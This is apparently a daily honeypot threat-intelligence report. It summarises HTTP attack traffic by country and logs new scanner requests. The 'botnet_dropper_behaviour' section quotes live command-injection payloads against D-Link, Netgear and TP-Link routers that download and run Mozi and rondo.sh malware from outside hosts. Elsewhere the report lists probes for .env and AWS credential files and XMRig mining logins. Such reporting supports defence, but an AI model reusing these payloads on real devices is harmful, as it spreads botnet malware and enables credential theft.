Report: 2025-06-21

Report Daily
Author: Shoggoth Industries

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today's report, we detected 3 stage-1 IP addresses, linked to 3 dropper URLs.

There are 48 new requests that have never been observed before (these were added to the monitored request database).

A total of 863 requests were recorded during the day, originating from 3 different countries, with a peak of 220 requests coming from GB.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

source_country   targeted_country
US               Germany
SG               Germany
US               Dubai

botnet_dropper_behaviour

remote_addr      request
77.239.211.92    27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
175.107.1.120    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.120:49904/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.135.194.34    GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1

request

The requests listed here are those that have not yet been integrated into the request database.

number_of_occurrence  request
4  GET /conf.env HTTP/1.1
4  GET /ses.env HTTP/1.1
3  GET /page/style/index.css HTTP/1.1
2  GET /.env.pgsql HTTP/1.1
2  GET /.env.bak.1 HTTP/1.1
2  GET /.env-usage HTTP/1.1
2  GET /.env-event HTTP/1.1
2  GET /.env-trace HTTP/1.1
2  GET /.env.old.1 HTTP/1.1
2  GET /.env.netrc HTTP/1.1
2  GET /.env-queue HTTP/1.1
2  GET /logon.env HTTP/1.1
2  GET /m/.env HTTP/1.1
2  GET /.env_panel HTTP/1.1
2  GET /awstats.jsp HTTP/1.1
2  GET /.env.azure HTTP/1.1
2  GET /.aws/konfig HTTP/1.1
2  GET /awstats.php HTTP/1.1
2  GET /tmp/.env.db HTTP/1.1
2  GET /aws/s3.yaml HTTP/1.1
2  GET /awstats.txt HTTP/1.1
2  GET /.aws/secret HTTP/1.1
2  GET /.aws/.s3cfg HTTP/1.1
2  GET /storage.env HTTP/1.1
2  GET /yii/env.php HTTP/1.1
2  GET /.env-token HTTP/1.1
1  GET /crypto/ HTTP/1.1
1  GET /wallet/ HTTP/1.1
1  GET /payment/ HTTP/1.1
1  GET /dump/ HTTP/1.1
1  GET /usdt/ HTTP/1.1
1  GET /withdraw/ HTTP/1.1
1  GET /Odin/http/call1750468598 HTTP/1.1
1  GET /odinhttpcall1750468598 HTTP/1.1
1  GET /OdinHttpCall1750468598 HTTP/1.1
1  {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x2b34297722808327901c27cdbfa2a16730e3bba4\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1  {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2249FnoPeFwQSJv7s63JRLMP7E2JNsQB4sW57uqUAyh3m7A8bjmoLTYMhioA148bTijtPXEq8xcBtJEb5RoPnV4LZHNd4iN5y\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
1  GET /three-stickers-for-all HTTP/1.1
1  \x00\x0E\x08o\x8D\x890d\xBF\x8D\xE3\x00\x00\x00\x00\x00
1  \x00\x0E8o\x8D\x890d\xBF\x8D\xE3\x00\x00\x00\x00\x00
1  \x00\x0E\x08>%\x82\xE1\xD1v\xF1\x9C\x00\x00\x00\x00\x00
1  \x00\x0E8>%\x82\xE1\xD1v\xF1\x9C\x00\x00\x00\x00\x00
1  \x00\x0E\x08\xBE\xFF\xBE=\xC9\xD0\xBA\x86\x00\x00\x00\x00\x00
1  \x00\x0E8\xBE\xFF\xBE=\xC9\xD0\xBA\x86\x00\x00\x00\x00\x00
1  \x00\x0E\x08\x07\xD3\xD0\x0CL\xCB\x9B\x83\x00\x00\x00\x00\x00
1  \x00\x0E8\x07\xD3\xD0\x0CL\xCB\x9B\x83\x00\x00\x00\x00\x00
1  {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x8602ddf663141e59d80fb86fae4f37c9e73008f3\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1  {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2243Apj7bamzWjdxdhAjT7B8LHrHwa2m6PXLX6CdFKG6toQasL5ct16z2Wq1e9rKPNo6SpvyeBAxBQdaGB61Gny6z9JUzc6S4\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}

country_iso_code

number_of_occurrence  country_iso_code
220  GB
210  US
98   NL
68   DE
47   TW
45   BG
24   JP
21   HK
15   AU
12   SC
11   GH
8    NG
8    PL
7    RU
7    ZA
6    MD
6    SG
5    TR
5    BE
5    LT
3    UA
3    BR
2    ES
2    AE
2    FI
2    KZ
2    IE
2    TH
2    SE
2    IL
2    ID
1    IN
1    CN
1    KE
1    CO
1    KR
1    MC
1    IR
1    FR
1    PA
1    AO
1    PK
